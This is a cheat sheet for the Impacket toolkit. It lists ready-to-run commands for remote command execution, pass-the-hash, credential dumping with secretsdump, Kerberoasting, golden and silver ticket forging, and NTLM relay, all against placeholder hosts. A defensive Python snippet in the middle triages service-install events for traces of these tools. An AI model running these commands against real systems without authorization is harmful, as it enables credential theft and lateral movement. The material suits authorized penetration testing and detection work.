
# Impacket Toolkit Cheat Sheet


## Overview

Impacket is a collection of Python classes for working with network protocols. It provides low-level programmatic access to packets and implements several protocols, including SMB, MSRPC and Kerberos. Impacket ships with numerous ready-to-use tools for penetration testing, focused especially on Windows environments.

Warning: Impacket is a security testing tool that must only be used in environments where you have explicit permission to do so.

## Installation

### From PyPI

```bash
pip install impacket
```

### From GitHub

```bash
git clone https://github.com/fortra/impacket.git
cd impacket
pip install -r requirements.txt
python setup.py install
```

### On Kali Linux

```bash
sudo apt update
sudo apt install -y python3-impacket
```

### Using a virtual environment

```bash
# Create and activate virtual environment
python -m venv impacket-env
source impacket-env/bin/activate  # Linux/macOS
impacket-env\Scripts\activate.bat  # Windows

# Install Impacket
pip install impacket
```

## Command Execution Tools

### psexec.py

Executes commands on remote Windows systems over the SMB protocol, similar to SysInternals PsExec.

#### Basic usage

```bash
psexec.py [domain/]username[:password]@target [options] [command]
```

#### Common options

| Option | Description |
|---|---|
| `-hashes` | Use NTLM hashes instead of a password (Pass-the-Hash) |
| `-k` | Use Kerberos authentication |
| `-no-pass` | Don't ask for a password (useful with Kerberos) |
| `-port` | Connect to SMB server port (default: 445) |
| `-debug` | Turn DEBUG output on |

##### Examples

```bash
# Execute command with explicit credentials
psexec.py administrator:Password123@192.168.1.100 cmd.exe

# Execute command with domain credentials
psexec.py domain/administrator:Password123@192.168.1.100 cmd.exe

# Execute specific command
psexec.py administrator:Password123@192.168.1.100 "ipconfig /all"

# Use hash instead of password (Pass-the-Hash)
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100 cmd.exe
```

### smbexec.py

Similar to psexec.py but uses different techniques to execute commands, which can make it stealthier.

#### Basic usage

```bash
smbexec.py [domain/]username[:password]@target [options]
```

#### Common options

| Option | Description |
|---|---|
| `-hashes` | Use NTLM hashes instead of a password (Pass-the-Hash) |
| `-share` | Share from which the output will be grabbed (default: ADMIN$) |
| `-shell-type` | Shell type to use (default: cmd) |
| `-codec` | Encoding (codec) used for the target's output (default: UTF-8) |
| `-service-name` | Service name to use (default: random) |

##### Examples

```bash
# Execute with explicit credentials
smbexec.py administrator:Password123@192.168.1.100

# Execute with domain credentials
smbexec.py domain/administrator:Password123@192.168.1.100

# Use hash instead of password (Pass-the-Hash)
smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100

# Use PowerShell instead of cmd
smbexec.py -shell-type powershell administrator:Password123@192.168.1.100
```

### wmiexec.py

Executes commands on remote Windows systems using WMI.

#### Basic usage

```bash
wmiexec.py [domain/]username[:password]@target [options] [command]
```

#### Common options

| Option | Description |
|---|---|
| `-hashes` | Use NTLM hashes instead of a password (Pass-the-Hash) |
| `-share` | Share from which the output will be grabbed (default: ADMIN$) |
| `-nooutput` | Execute the command and return immediately without output |
| `-codec` | Encoding (codec) used for the target's output (default: UTF-8) |
| `-shell-type` | Shell type to use (default: cmd) |

##### Examples

```bash
# Execute with explicit credentials
wmiexec.py administrator:Password123@192.168.1.100

# Execute with domain credentials
wmiexec.py domain/administrator:Password123@192.168.1.100

# Execute specific command
wmiexec.py administrator:Password123@192.168.1.100 "ipconfig /all"

# Use hash instead of password (Pass-the-Hash)
wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100
```

### dcomexec.py

Executes commands on remote Windows systems using DCOM objects.

#### Basic usage

```bash
dcomexec.py [domain/]username[:password]@target [options] [command]
```

#### Common options

| Option | Description |
|---|---|
| `-hashes` | Use NTLM hashes instead of a password (Pass-the-Hash) |
| `-object` | DCOM object to use (default: MMC20.Application) |
| `-nooutput` | Execute the command and return immediately without output |
| `-codec` | Encoding (codec) used for the target's output (default: UTF-8) |
| `-shell-type` | Shell type to use (default: cmd) |

##### Examples

```bash
# Execute with explicit credentials
dcomexec.py administrator:Password123@192.168.1.100

# Execute with domain credentials
dcomexec.py domain/administrator:Password123@192.168.1.100

# Execute with specific DCOM object
dcomexec.py -object ShellWindows administrator:Password123@192.168.1.100

# Use hash instead of password (Pass-the-Hash)
dcomexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100
```

### atexec.py

Executes commands on remote Windows systems using the Task Scheduler service.

#### Basic usage

```bash
atexec.py [domain/]username[:password]@target [options] command
```

#### Common options

| Option | Description |
|---|---|
| `-hashes` | Use NTLM hashes instead of a password (Pass-the-Hash) |
| `-silentcommand` | Execute the command and return immediately without output |
| `-codec` | Encoding (codec) used for the target's output (default: UTF-8) |

##### Examples

```bash
# Execute command with explicit credentials
atexec.py administrator:Password123@192.168.1.100 "whoami > C:\\temp\\whoami.txt"

# Execute command with domain credentials
atexec.py domain/administrator:Password123@192.168.1.100 "whoami > C:\\temp\\whoami.txt"

# Use hash instead of password (Pass-the-Hash)
atexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100 "whoami > C:\\temp\\whoami.txt"
```
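From the defender's side, the execution tools above leave service-installation artifacts. As an added example (not code from the original page or from Impacket), the following Python triages constructed System-log Event ID 7045 (service installed) records for two of them: a service binary dropped into the Windows directory root (where the ADMIN$ share maps, as psexec.py does) and a `%COMSPEC%` service command line that redirects output to a loopback UNC share (the smbexec.py pattern). Event shapes, service names and paths are constructed samples; the rules are assumptions based on how these tools install their services.

```python
import re

# Constructed records shaped like System log Event ID 7045 (service installed).
# Names and paths are sample data, not captured events.
SAMPLE_EVENTS = [
    {"id": 7045, "ServiceName": "Spooler",
     "ImagePath": r"C:\Windows\System32\spoolsv.exe"},
    {"id": 7045, "ServiceName": "kQzT",                       # psexec.py-like drop
     "ImagePath": r"%SystemRoot%\bXvMqWpL.exe"},
    {"id": 7045, "ServiceName": "aHtRgPwc",                   # smbexec.py-like command
     "ImagePath": r"%COMSPEC% /Q /c echo whoami ^> \\127.0.0.1\C$\__output 2^>^&1"
                  r" > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat"
                  r" & del %TEMP%\execute.bat"},
    {"id": 7045, "ServiceName": "BackupAgent",
     "ImagePath": r"C:\Program Files\Backup\agent.exe"},
    {"id": 7036, "ServiceName": "Spooler", "ImagePath": ""},  # not an install event
]

WIN_ROOT_EXE = re.compile(r"^C:\\Windows\\[^\\]+\.exe$", re.I)
LOOPBACK_UNC = re.compile(r"\\\\(?:127\.0\.0\.1|localhost)\\[A-Za-z]\$", re.I)
INTERPRETER = re.compile(r"^(?:%COMSPEC%|cmd(?:\.exe)?|powershell(?:\.exe)?)(?:\s|$)", re.I)

def triage_7045(event):
    """Return the reasons a service-install event deserves review (empty list = nothing notable)."""
    reasons = []
    path = event.get("ImagePath", "").strip('"')
    # Resolve the usual Windows-directory variables so the first rule sees a plain path.
    norm = re.sub(r"%(?:SystemRoot|windir)%", r"C:\\Windows", path, flags=re.I)
    if WIN_ROOT_EXE.match(norm):
        reasons.append("service binary in Windows directory root (admin share drop)")
    if INTERPRETER.match(path):
        reasons.append("service image is a command interpreter, not a binary")
    if LOOPBACK_UNC.search(path):
        reasons.append("output redirected to a loopback UNC share")
    return reasons

def triage_all(events):
    """Map each 7045 event's service name to its review reasons; other event IDs are ignored."""
    return {e["ServiceName"]: triage_7045(e) for e in events if e.get("id") == 7045}

if __name__ == "__main__":
    for name, reasons in triage_all(SAMPLE_EVENTS).items():
        print(name, reasons or "ok")
```

The same rules apply to a scheduled-task creation event for atexec.py, with the task's command line in place of the service image path.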

## Credential Dumping Tools

### secretsdump.py

Extracts credentials from a remote Windows system, including the SAM, LSA Secrets and NTDS.dit.

#### Basic usage

```bash
secretsdump.py [domain/]username[:password]@target [options]
```

#### Common options

| Option | Description |
|---|---|
| `-hashes` | Use NTLM hashes instead of a password (Pass-the-Hash) |
| `-just-dc` | Extract only NTDS.DIT data (domain controller only) |
| `-just-dc-ntlm` | Extract only NTDS.DIT NTLM hashes (domain controller only) |
| `-just-dc-user` | Extract only NTDS.DIT data for a specific user |
| `-pwd-last-set` | Show the pwdLastSet attribute for each NTDS.DIT account |
| `-user-status` | Show whether each user is enabled or disabled |
| `-history` | Dump password history |
| `-outputfile` | Write output to a file |

##### Examples

```bash
# Dump credentials with explicit credentials
secretsdump.py administrator:Password123@192.168.1.100

# Dump credentials with domain credentials
secretsdump.py domain/administrator:Password123@192.168.1.100

# Dump credentials using hash (Pass-the-Hash)
secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100

# Dump credentials from local files
secretsdump.py -sam sam.save -security security.save -system system.save LOCAL

# Dump credentials from NTDS.dit
secretsdump.py -ntds ntds.dit -system system.save LOCAL

# Extract only domain controller NTLM hashes
secretsdump.py -just-dc-ntlm domain/administrator:Password123@192.168.1.100
```

## Kerberos Attack Tools

### GetNPUsers.py

Retrieves password hashes for users that have "Do not require Kerberos preauthentication" set (AS-REP Roasting attack).

#### Basic usage

```bash
GetNPUsers.py [domain/]username[:password] -dc-ip <DC_IP> [options]
```

#### Common options

| Option | Description |
|---|---|
| `-request` | Request TGTs for the users and output them in JtR/hashcat format |
| `-no-pass` | Don't ask for a password (useful with Kerberos) |
| `-k` | Use Kerberos authentication |
| `-dc-ip` | IP address of the domain controller |
| `-usersfile` | File with one user per line to test |
| `-format` | Format in which to save the AS-REP responses (default: hashcat) |
| `-outputfile` | Output filename for the ciphers in JtR/hashcat format |

##### Examples

```bash
# Get users without Kerberos preauthentication with explicit credentials
GetNPUsers.py domain/username:password -dc-ip 192.168.1.100 -request

# Get users without Kerberos preauthentication for specific user
GetNPUsers.py domain/username:password -dc-ip 192.168.1.100 -request -target-user user1

# Get users without Kerberos preauthentication for all users in domain
GetNPUsers.py domain/ -dc-ip 192.168.1.100 -usersfile users.txt -format hashcat

# Use no credentials (anonymous)
GetNPUsers.py domain/ -dc-ip 192.168.1.100 -no-pass
```

### GetUserSPNs.py

Retrieves Service Principal Names (SPNs) for accounts in the domain (Kerberoasting attack).

#### Basic usage

```bash
GetUserSPNs.py [domain/]username[:password] -dc-ip <DC_IP> [options]
```

#### Common options

| Option | Description |
|---|---|
| `-request` | Request TGSs for the users and output them in JtR/hashcat format |
| `-hashes` | Use NTLM hashes instead of a password (Pass-the-Hash) |
| `-dc-ip` | IP address of the domain controller |
| `-request-user` | Target a specific user to request a TGS for |
| `-outputfile` | Output filename for the ciphers in JtR/hashcat format |
| `-format` | Format in which to save the TGS tickets (default: hashcat) |

##### Examples

```bash
# Get SPNs with explicit credentials
GetUserSPNs.py domain/username:password -dc-ip 192.168.1.100 -request

# Get SPNs for specific user
GetUserSPNs.py domain/username:password -dc-ip 192.168.1.100 -request-user sqlservice

# Output hashes in specific format
GetUserSPNs.py domain/username:password -dc-ip 192.168.1.100 -request -format hashcat

# Use hash instead of password (Pass-the-Hash)
GetUserSPNs.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 domain/username -dc-ip 192.168.1.100 -request
```

### ticketer.py

Creates Golden and Silver tickets for Kerberos authentication.

#### Basic usage

```bash
ticketer.py [options] username
```

#### Common options

| Option | Description |
|---|---|
| `-nthash` | NT hash for the user or service account |
| `-aesKey` | AES key for the user or service account |
| `-domain` | Domain name |
| `-domain-sid` | Domain SID |
| `-spn` | Service Principal Name (for Silver Tickets) |
| `-groups` | Comma-separated list of group IDs to include in the ticket |
| `-duration` | Ticket duration in hours (default: 10) |
| `-out` | Output filename to save the ticket |

##### Examples

```bash
# Create Golden Ticket
ticketer.py -nthash 7facdc498ed1680c4fd1448319a8c04f -domain-sid S-1-5-21-1234567890-1234567890-1234567890 -domain contoso.local administrator

# Create Silver Ticket
ticketer.py -nthash 7facdc498ed1680c4fd1448319a8c04f -domain-sid S-1-5-21-1234567890-1234567890-1234567890 -domain contoso.local -spn MSSQLSvc/sqlserver.contoso.local:1433 administrator

# Specify output file
ticketer.py -nthash 7facdc498ed1680c4fd1448319a8c04f -domain-sid S-1-5-21-1234567890-1234567890-1234567890 -domain contoso.local -out ticket.kirbi administrator
```

## Network Protocol Tools

### smbclient.py

Provides an SMB client for accessing shares and files on remote systems.

#### Basic usage

```bash
smbclient.py [domain/]username[:password]@target [options]
```

#### Common options

| Option | Description |
|---|---|
| `-hashes` | Use NTLM hashes instead of a password (Pass-the-Hash) |
| `-port` | Connect to SMB server port (default: 445) |
| `-inputfile` | Input file with commands to execute in the mini shell |
| `-debug` | Turn DEBUG output on |

#### Common interactive commands

##### Examples

```bash
# Connect with explicit credentials
smbclient.py administrator:Password123@192.168.1.100

# Connect with domain credentials
smbclient.py domain/administrator:Password123@192.168.1.100

# Use hash instead of password (Pass-the-Hash)
smbclient.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100
```

### mssqlclient.py

Provides a client for interacting with Microsoft SQL Server instances.

#### Basic usage

```bash
mssqlclient.py [domain/]username[:password]@target [options]
```

#### Common options

| Option | Description |
|---|---|
| `-hashes` | Use NTLM hashes instead of a password (Pass-the-Hash) |
| `-windows-auth` | Use Windows authentication (default: False) |
| `-port` | Destination port to connect to (default: 1433) |
| `-db` | MSSQL database instance (default: None) |
| `-file` | Input file with commands to execute in the SQL shell |
| `-debug` | Turn DEBUG output on |

#### Common interactive commands

##### Examples

```bash
# Connect with explicit credentials
mssqlclient.py sa:Password123@192.168.1.100

# Connect with domain credentials
mssqlclient.py domain/sqluser:Password123@192.168.1.100

# Use hash instead of password (Pass-the-Hash)
mssqlclient.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 sa@192.168.1.100

# Enable Windows authentication
mssqlclient.py domain/sqluser:Password123@192.168.1.100 -windows-auth
```

## Other Useful Tools

### ntlmrelayx.py

Performs NTLM relay attacks.

#### Basic usage

```bash
ntlmrelayx.py [options]
```

#### Common options

| Option | Description |
|---|---|
| `-t` | Target to relay the credentials to |
| `-tf` | File with targets to relay the credentials to |
| (option not recovered) | Start the HTTP server and do not relay credentials |
| `-e` | Execute this file when a connection is relayed |
| `-c` | Execute this command when a connection is relayed |
| `-smb2support` | Enable SMB2 support |
| `-socks` | Launch a SOCKS proxy for the connection |
| (option not recovered) | Relay only one connection |
| `-debug` | Turn DEBUG output on |

##### Examples

```bash
# Relay to specific target
ntlmrelayx.py -t smb://192.168.1.100 -smb2support

# Relay to multiple targets
ntlmrelayx.py -tf targets.txt -smb2support

# Execute command on successful relay
ntlmrelayx.py -t smb://192.168.1.100 -smb2support -c "whoami > C:\\temp\\whoami.txt"

# Dump SAM database on successful relay
ntlmrelayx.py -t smb://192.168.1.100 -smb2support -d

# Start SOCKS proxy
ntlmrelayx.py -tf targets.txt -socks
```

### lookupsid.py

Performs SID lookups to enumerate users and groups.

#### Basic usage

```bash
lookupsid.py [domain/]username[:password]@target [options]
```

#### Common options

| Option | Description |
|---|---|
| `-hashes` | Use NTLM hashes instead of a password (Pass-the-Hash) |
| (option not recovered) | Domain to enumerate (default: target domain) |
| `-debug` | Turn DEBUG output on |

##### Examples

```bash
# Enumerate SIDs with explicit credentials
lookupsid.py administrator:Password123@192.168.1.100

# Enumerate SIDs with domain credentials
lookupsid.py domain/administrator:Password123@192.168.1.100

# Use hash instead of password (Pass-the-Hash)
lookupsid.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100
```

### reg.py

Provides a remote registry manipulation tool.

#### Basic usage

```bash
reg.py [domain/]username[:password]@target [options] action [params]
```

#### Common options

| Option | Description |
|---|---|
| `-hashes` | Use NTLM hashes instead of a password (Pass-the-Hash) |
| `-debug` | Turn DEBUG output on |

#### Actions

| Action | Description |
|---|---|
| `query` | Query a registry key or value |
| `add` | Add a registry key or value |
| `delete` | Delete a registry key or value |
| `save` | Save a registry hive to a file |

##### Examples

```bash
# Query registry key with explicit credentials
reg.py administrator:Password123@192.168.1.100 query -keyName HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion

# Add registry key with domain credentials
reg.py domain/administrator:Password123@192.168.1.100 add -keyName HKLM\\SOFTWARE\\Test -v TestValue -vt REG_SZ -vd "Test Data"

# Delete registry key with hash (Pass-the-Hash)
reg.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100 delete -keyName HKLM\\SOFTWARE\\Test
```

## Common parameters across tools

| Parameter | Description |
|---|---|
| `-h` | Show help message and exit |
| `-debug` | Turn DEBUG output on |
| `-hashes` | NTLM hashes, in the format LMHASH:NTHASH |
| `-no-pass` | Don't ask for a password (useful with Kerberos) |
| `-k` | Use Kerberos authentication |
| `-aesKey` | AES key to use for Kerberos authentication |
| `-dc-ip` | IP address of the domain controller |
| `-target-ip` | IP address of the target machine |
| `-port` | Destination port to connect to |

## Resources

- Official GitHub repository: https://github.com/fortra/impacket
- Impacket documentation
- Impacket examples
- Impacket wiki
- Impacket API documentation